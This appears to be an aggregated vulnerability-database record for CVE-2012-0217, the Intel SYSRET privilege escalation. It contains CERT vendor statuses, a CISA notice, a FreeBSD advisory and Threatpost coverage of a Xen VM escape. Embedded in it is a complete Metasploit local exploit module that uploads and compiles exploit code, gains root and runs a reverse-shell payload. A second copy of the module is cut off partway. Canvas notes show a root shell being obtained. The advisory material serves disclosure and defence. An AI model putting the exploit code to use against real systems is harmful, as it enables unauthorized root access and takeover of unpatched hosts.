Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Citrix __ Affected\n\nUpdated: June 18, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nA number of security vulnerabilities have been identified in Citrix XenServer. These vulnerabilities affect all currently supported versions of Citrix XenServer up to and including version 6.0.2.\n\nThe following issues have been addressed: \n \n\u2022 64-bit PV guest to host privilege escalation vulnerability. This issue only impacts servers running on Intel processors and could permit a 64-bit PV guest to compromise the XenServer host (CVE-2012-0217). \n \n\u2022 Guest denial of service on syscall/sysenter exception generation. This issue could permit user code within a PV guest to crash the guest operating system (CVE-2012-0218). \n \n\u2022 Administrative connections to VM consoles through XAPI or XenCenter could be routed to the wrong VM.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.citrix.com/article/CTX133161>\n\n### FreeBSD Project Affected\n\nNotified: May 01, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>\n\n### Intel Corporation __ Affected\n\nNotified: May 01, 2012 Updated: June 13, 2012 \n\n**Statement Date: June 13, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis is a software implementation issue. Intel processors are functioning as per specifications and this behavior is correctly documented in the IntelR64 Software Developers Manual, Volume 2B Pages 4-598-599.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Joyent __ Affected\n\nUpdated: June 14, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have an illumos-derived system, SmartOS -- it (and every other illumos derivative) was affected by this vulnerability. illumos issue: <https://www.illumos.org/issues/2873>\n\nPatch is in hg changeset: 13724:7740792727e0. This can also be found on the github bridge: <https://github.com/illumos/illumos-gate/commit/6ba2dbf5e79c7fc6e1221844ddaa2c88a42a3fc1> \n \nJoyent's cloud customers are unaffected. Joyent's SmartDataCenter customers will be receiving an updated platform, versioned joyent_20120614T001014Z.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.illumos.org/issues/2873>\n * <https://github.com/illumos/illumos-gate/commit/6ba2dbf5e79c7fc6e1221844ddaa2c88a42a3fc1>\n\n### Microsoft Corporation __ Affected\n\nNotified: May 01, 2012 Updated: June 18, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThis security update resolves one privately reported vulnerability and one publicly disclosed vulnerability in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that exploits the vulnerability. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.\n\n### Vendor References\n\n * <https://technet.microsoft.com/en-us/security/bulletin/MS12-042>\n\n### NetBSD Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oracle Corporation Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: May 11, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. Affected\n\nNotified: May 01, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=813428>\n * <https://access.redhat.com/security/cve/CVE-2012-0217>\n * <https://rhn.redhat.com/errata/RHSA-2012-0720.html>\n * <https://rhn.redhat.com/errata/RHSA-2012-0721.html>\n\n### SUSE Linux Affected\n\nNotified: May 02, 2012 Updated: June 12, 2012 \n\n**Statement Date: May 02, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2012-0217.html>\n\n### Xen Affected\n\nNotified: May 02, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>\n\n### AMD __ Not Affected\n\nUpdated: June 13, 2012 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSystems using AMD CPUs are not vulnerable to this privilege escalation. AMD have issued the following statement:\n\n \n_ AMD processors' SYSRET behavior is such that a non-canonical address in RCX does not generate a #GP while in CPL0. We have verified this with our architecture team, with our design team, and have performed tests that verified this on silicon. Therefore, this privilege escalation exposure is not applicable to any AMD processor._ \nThis statement comes from the Xen security advisory. \n\n### Apple Inc. Not Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: May 15, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenBSD Not Affected\n\nUpdated: June 25, 2012 \n\n**Statement Date: June 25, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### VMware __ Not Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: June 08, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe VMware Security Response Center has reviewed the technical details of CVE-2012-0217, the \"#GP in sysret\" vulnerability. The \"sysret\" instruction is not used in VMware hypervisor code, therefore VMware products are not affected by this issue. Please note that guest operating systems that are installed as virtual machines may be affected and should be patched based on the recommendation of their respective OS vendors.\n\nFor further questions on this or any security vulnerability, please contact the VSRC at security@vmware.com.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Parallels Holdings Ltd Unknown\n\nNotified: May 21, 2012 Updated: May 21, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 22 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.6 | AV:L/AC:M/Au:S/C:C/I:C/A:C \nTemporal | 5.5 | E:F/RL:OF/RC:C \nEnvironmental | 5.5 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://en.wikipedia.org/wiki/Ring_3>\n * <http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>\n * <http://blog.xen.org/index.php/2012/06/13/the-intel-sysret-privilege-escalation/>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=813428>\n * <http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>\n * <http://blog.gmane.org/gmane.linux.kernel.commits.2-4/month=20060401>\n * <http://lists.xen.org/archives/html/xen-devel/2012-06/msg01072.html>\n * <http://www.vupen.com/blog/20120904.Advanced_Exploitation_of_Xen_Sysret_VM_Escape_CVE-2012-0217.php>\n\n### Acknowledgements\n\nThanks to Rafal Wojtczuk of Bromium, Inc. for reporting this vulnerability.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-0217](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-0217>), [CVE-2006-0744](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-0744>) \n---|--- \n**Date Public:** | 2006-04-12 \n**Date First Published:** | 2012-06-12 \n**Date Last Updated: ** | 2012-09-04 20:47 UTC \n**Document Revision: ** | 88 \n", "modified": "2012-09-04T20:47:00", "published": "2012-06-12T00:00:00", "id": "VU:649219", "href": "https://www.kb.cert.org/vuls/id/649219", "type": "cert", "title": "SYSRET 64-bit operating system privilege escalation vulnerability on Intel CPU hardware", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2020-12-18T18:08:15", "bulletinFamily": "info", "cvelist": ["CVE-2012-0217"], "description": "Microsoft has released updates to address vulnerabilities in Microsoft Windows, Internet Explorer, .NET Framework, Lync, and Dynamics AX as part of the Microsoft Security Bulletin Summary for [June 2012](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jun>). These vulnerabilities may allow an attacker to execute arbitrary code or operate with elevated privileges. \n \nUS-CERT encourages users and administrators to review the [bulletin](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jun>) and follow best-practices security policies to determine which updates should be applied. \n \nAdditional information regarding CVE-2012-0217 can be found in the US-CERT Vulnerability Note [VU#649219](<http://www.kb.cert.org/vuls/id/649219>). \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2012/06/07/Microsoft-Releases-June-Security-Bulletin>); we'd welcome your feedback.\n", "modified": "2012-10-23T00:00:00", "published": "2012-06-07T00:00:00", "id": "CISA:6C290D75BE52A220342D9856F873C16E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2012/06/07/Microsoft-Releases-June-Security-Bulletin", "type": "cisa", "title": "Microsoft Releases June Security Bulletin", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-03-09T14:29:23", "description": "Exploit for freebsd platform in category local exploits", "edition": 1, "published": "2019-03-07T00:00:00", "title": "FreeBSD - Intel SYSRET Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2019-03-07T00:00:00", "id": "1337DAY-ID-32324", "href": "https://0day.today/exploit/description/32324", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the FreeBSD kernel,\r\n when running on 64-bit Intel processors.\r\n\r\n By design, 64-bit processors following the X86-64 specification will\r\n trigger a general protection fault (GPF) when executing a SYSRET\r\n instruction with a non-canonical address in the RCX register.\r\n\r\n However, Intel processors check for a non-canonical address prior to\r\n dropping privileges, causing a GPF in privileged mode. As a result,\r\n the current userland RSP stack pointer is restored and executed,\r\n resulting in privileged code execution.\r\n\r\n This module has been tested successfully on:\r\n\r\n FreeBSD 8.3-RELEASE (amd64); and\r\n FreeBSD 9.0-RELEASE (amd64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Rafal Wojtczuk', # Discovery\r\n 'John Baldwin', # Discovery\r\n 'iZsh', # Exploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => '2012-06-12',\r\n 'Platform' => ['bsd'],\r\n 'Arch' => [ARCH_X64],\r\n 'SessionTypes' => ['shell'],\r\n 'References' =>\r\n [\r\n ['BID', '53856'],\r\n ['CVE', '2012-0217'],\r\n ['EDB', '28718'],\r\n ['PACKETSTORM', '113584'],\r\n ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],\r\n ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],\r\n ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],\r\n ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],\r\n ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],\r\n ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']\r\n ],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },\r\n 'DefaultTarget' => 0))\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data, gcc_args='')\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n chmod path\r\n end\r\n\r\n def exploit_data(file)\r\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file)\r\n end\r\n\r\n def is_root?\r\n (cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0')\r\n end\r\n\r\n def strip_comments(c_code)\r\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\r\n end\r\n\r\n def check\r\n kernel_release = cmd_exec('uname -r').to_s\r\n unless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/\r\n vprint_error \"FreeBSD version #{kernel_release} is not vulnerable\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n vprint_good \"FreeBSD version #{kernel_release} appears vulnerable\"\r\n\r\n arch = cmd_exec('uname -m').to_s\r\n unless arch.include? '64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n hw_model = cmd_exec('/sbin/sysctl hw.model').to_s\r\n unless hw_model.downcase.include? 'intel'\r\n vprint_error \"#{hw_model} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{hw_model} is vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload and compile exploit executable\r\n executable_name = \".#{rand_text_alphanumeric 5..10}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall'\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec executable_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n unless is_root?\r\n fail_with Failure::Unknown, 'Exploitation failed'\r\n end\r\n print_good \"Success! Executing payload...\"\r\n\r\n cmd_exec payload_path\r\n end\r\nend\n\n# 0day.today [2019-03-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32324"}], "freebsd": [{"lastseen": "2019-05-29T18:33:48", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217"], "description": "\nProblem description:\n\nFreeBSD/amd64 runs on CPUs from different vendors. Due to varying\n\t behaviour of CPUs in 64 bit mode a sanity check of the kernel may be\n\t insufficient when returning from a system call.\nSuccessful exploitation of the problem can lead to local kernel privilege\n\t escalation, kernel data corruption and/or crash.\n\t To exploit this vulnerability, an attacker must be able to run code with user\n\t privileges on the target system.\n\n", "edition": 4, "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "AED44C4E-C067-11E1-B5E0-000C299B62E1", "href": "https://vuxml.freebsd.org/freebsd/aed44c4e-c067-11e1-b5e0-000c299b62e1.html", "title": "FreeBSD -- Privilege escalation when returning from kernel", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:02:19", "bulletinFamily": "info", "cvelist": ["CVE-2012-0217"], "description": "Details of a dangerous virtual machine escape exploit were revealed Wednesday by French research outfit VUPEN Security. The attack exploits a recently reported [vulnerability in Xen hypervisors](<http://www.vupen.com/blog/20120904.Advanced_Exploitation_of_Xen_Sysret_VM_Escape_CVE-2012-0217.php>) and allows an attacker within a guest virtual machine to escape to the host and execute code.\n\nVirtual machine (VM) escapes have been in circulation since 2008, the most notable being Cloudburst, an exploit in Immunity\u2019s CANVAS pen-testing tool. VUPEN\u2019s exploit would escalate an attacker\u2019s local privileges to the most privileged domain, essentially giving the outsider control over the host and other guest VMs, VUPEN researcher Jordan Gruskovnjak said in a post on the VUPEN Vulnerability Research Blog\n\nThe exploit targets a vulnerability reported in June that affects the way Intel processors implement error handling in the AMD SYSRET instruction. The vulnerability is in the instruction, and not the chip, US-CERT said in its June alert.\n\n\u201cThe x86-64 kernel system-call functionality in Xen 4.1.2 and earlier incorrectly uses the SYSRET path in cases where a certain address is not a canonical address, which allows local users to gain privileges via a crafted application,\u201d cautioned the advisory for CVE-2012-0217.\n\nThe Xen Project, which manages the open source code, repaired the vulnerability in June, as did [Citrix](<http://support.citrix.com/article/CTX133161>) and other virtualization vendors such as Red Hat, Microsoft, Oracle, FreeBSD, NetBSD and SUSE Linux patched their respective products. Unpatched versions remain vulnerable.\n\nVUPEN said it was able to exploit this vulnerability on a 64-bit Linux paravirtualized guest running on Citrix XenServer 6.0.0 with Xen version 4.1.1. It cautions other versions are vulnerable as well. The attack is a local privilege escalation attack that targets the dom0 virtual machine, the most privileged domain. Dom0, VUPEN explained, is the only VM by default that has access to hardware, and from there can manipulate the hypervisor to launch unpriviledged domains.\n\n\u201cThe strategy here will be to inject a dom0 root process with a bindshell (or reverse shell) payload in order to get a root shell from dom0,\u201d Gruskovnjak said. \u201cThe same idea as in remote kernel exploitation will be used: hijack the interrupt 0x80 syscall handler in order to wait for an interruption from dom0 to occur. When an interrupt is triggered from dom0, one is assured that dom0 virtual pages are mapped into memory.\u201d\n\nTim Deegan, a computer scientist in England and one of the maintainers of the Xen hypervisor code, said it was interesting VUPEN would choose inject code into dom0 rather than exploit the hypervisor privilege or elevate the privilege of the calling domain.\n\n\u201cI had imagined that an attacker would elevate the privilege of their malicious VM to and then map other VMs\u2019 memory and CPU state directly, but that involves doing some work to understand the OS \nstructures of the other VMs,\u201d Deegan wrote in an email to Threatpost. \u201cInjecting a process into dom0 lets them just use the existing management toolstack to manipulate other VMs.\u201d\n\nThis vulnerability was covered in depth at the Black Hat Briefings in Las Vegas last month by researcher [Rafal Wojtczuk of Bromium](<http://media.blackhat.com/bh-us-12/Briefings/Wojtczuk/BH_US_12_Wojtczuk_A_Stitch_In_Time_WP.pdf>). Wojtczuk and Jan Beulich of SUSE Linux reported the vulnerability in June.\n\nThis story was updated on Sept. 6 to add comments from Tim Deegan and a clarification that Citrix also added a hotfix in June. \n", "modified": "2013-04-17T16:31:36", "published": "2012-09-06T11:52:32", "id": "THREATPOST:A591D9D4EF6EA028B6F5C9C16D8FB392", "href": "https://threatpost.com/virtual-machine-escape-exploit-targets-xen-090612/76979/", "type": "threatpost", "title": "Virtual Machine Escape Exploit Targets Xen", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:16", "bulletinFamily": "info", "cvelist": ["CVE-2012-0217"], "description": "[](<https://threatpost.com/security-risks-abound-virtualized-environments-031610/>)Through 2012, 60 percent of virtualized servers will be less secure \nthan the physical servers they replace, according to Gartner. Although \nthey expect this figure to fall to 30 percent by the end of 2015, \nanalysts warned that many virtualization deployment projects are being \nundertaken without involving the information security team in the \ninitial architecture and planning stages. [Read the full article](<http://www.net-security.org/secworld.php?id=9023>). [Help Net Security]\n", "modified": "2018-08-15T13:14:04", "published": "2010-03-16T13:49:58", "id": "THREATPOST:D620254532F7EFC9F36DE3B4164B6875", "href": "https://threatpost.com/security-risks-abound-virtualized-environments-031610/73691/", "type": "threatpost", "title": "Security Risks Abound in Virtualized Environments", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2016-09-25T14:12:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "edition": 1, "description": "**Name**| ms12_042 \n---|--- \n**CVE**| CVE-2012-0217 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS12-042 Privilege Escalation Exploit \n**Notes**| Repeatability: \nNotes: \n \nThis vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2. \n \nThe exploit will also facilitate the loading of unsigned kernel drivers \nwithout triggering any alerts on 64bit Windows. \n \nhttp://repret.wordpress.com/2012/08/25/windows-kernel-intel-x64-sysret-vulnerability-code-signing-bypass-bonus/ \n \nTested on: \nWindows Server 2008 R2 x64 \nWindows 7 Professional SP1 x64 \n \n \nVENDOR: Microsoft \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217 \nCVE Name: CVE-2012-0217 \n\n", "modified": "2012-06-12T18:55:01", "published": "2012-06-12T18:55:01", "id": "MS12_042", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms12_042", "type": "canvas", "title": "Immunity Canvas: MS12_042", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:48:23", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "edition": 2, "description": "**Name**| SYSRET \n---|--- \n**CVE**| CVE-2012-0217 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| SYSRET: exploit for invalid #GP @ CPL0 handling (FreeBSD AMD64 version) \n**Notes**| CVE Name: CVE-2012-0217 \nVENDOR: Intel,FreeBSD \nNotes: \nTested on FreeBSD 9.0-RC3 and FreeBSD 9.0-RELEASE* AMD64 \n \nTo test this exploit from CANVAS use the ./backdoors/mosdef_callbacks/mosdef_callback_fbsd9_i386 \ncallback binary to establish a BSD node on a universal CANVAS listener. Then run the SYSRET \nmodule against this node to elevate your privileges on the node. This should work on FreeBSD \n9.0-RELEASE* amd64 on 64bit Intel processors. Note this will not spawn a new node, but rather \nkeep the existing node connection with elevated privileges. \n \nAlternatively you can use the Resources/x binary outside of the framework. \n \n$ uname -a \nFreeBSD freebsd90 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 \n$ id \nuid=1001(immunity) gid=1001(immunity) groups=1001(immunity) \n$ ./x \n[***] FeeBSD amd64 local r00t - sysret [***] \n[DEBUG]: current target: 9.0-RELEASE \n[DEBUG]: supported release: 9.0-RELEASE found \n[DEBUG]: Triggering fault.. \n[DEBUG]: Resumed!!!! -> geteuid()=0 \n# id \nuid=1001(immunity) gid=1001(immunity) euid=0(root) groups=1001(immunity) \n# \n \n \nRepeatability: Infinite \nReferences: http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217 \n\n", "modified": "2012-06-12T22:55:00", "published": "2012-06-12T22:55:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/SYSRET", "id": "SYSRET", "type": "canvas", "title": "Immunity Canvas: SYSRET", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-03-07T15:18:36", "description": "", "published": "2019-03-07T00:00:00", "type": "exploitdb", "title": "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2019-03-07T00:00:00", "id": "EDB-ID:46508", "href": "https://www.exploit-db.com/exploits/46508", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the FreeBSD kernel,\r\n when running on 64-bit Intel processors.\r\n\r\n By design, 64-bit processors following the X86-64 specification will\r\n trigger a general protection fault (GPF) when executing a SYSRET\r\n instruction with a non-canonical address in the RCX register.\r\n\r\n However, Intel processors check for a non-canonical address prior to\r\n dropping privileges, causing a GPF in privileged mode. As a result,\r\n the current userland RSP stack pointer is restored and executed,\r\n resulting in privileged code execution.\r\n\r\n This module has been tested successfully on:\r\n\r\n FreeBSD 8.3-RELEASE (amd64); and\r\n FreeBSD 9.0-RELEASE (amd64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Rafal Wojtczuk', # Discovery\r\n 'John Baldwin', # Discovery\r\n 'iZsh', # Exploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => '2012-06-12',\r\n 'Platform' => ['bsd'],\r\n 'Arch' => [ARCH_X64],\r\n 'SessionTypes' => ['shell'],\r\n 'References' =>\r\n [\r\n ['BID', '53856'],\r\n ['CVE', '2012-0217'],\r\n ['EDB', '28718'],\r\n ['PACKETSTORM', '113584'],\r\n ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],\r\n ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],\r\n ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],\r\n ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],\r\n ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],\r\n ['URL', 